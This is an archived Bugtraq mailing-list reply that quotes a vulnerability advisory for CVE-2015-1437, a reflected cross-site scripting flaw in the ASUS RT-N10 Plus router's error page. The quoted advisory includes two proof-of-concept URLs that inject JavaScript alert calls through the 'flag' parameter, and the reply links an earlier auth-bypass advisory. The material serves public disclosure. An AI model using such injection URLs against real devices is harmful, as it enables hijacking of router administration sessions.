| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20150204134449.GA18837@komma-nix.de>
Date: Wed, 4 Feb 2015 14:44:49 +0100
From: Michael Meyer <micha@...ma-nix.de>
To: bugtraq@...urityfocus.com
Subject: Re: CVE-2015-1437 XSS In ASUS Router.
*** kingkaustubh@...com wrote:
> #####################################
> Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router
> Author: Kaustubh G. Padwad
> Product: ASUS Router RT-N10 Plus
> Firmware: 2.1.1.1.70
> Severity: HIGH
> Auth: Not requierd
> CVE ID: CVE-2015-1437
> # Description:
> Vulnerable Parameter: flag=
> # Vulnerability Class:
> Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
[...]
> Enter this URL
> 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d
> 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d
https://sintonen.fi/advisories/asus-router-auth-bypass.txt
Micha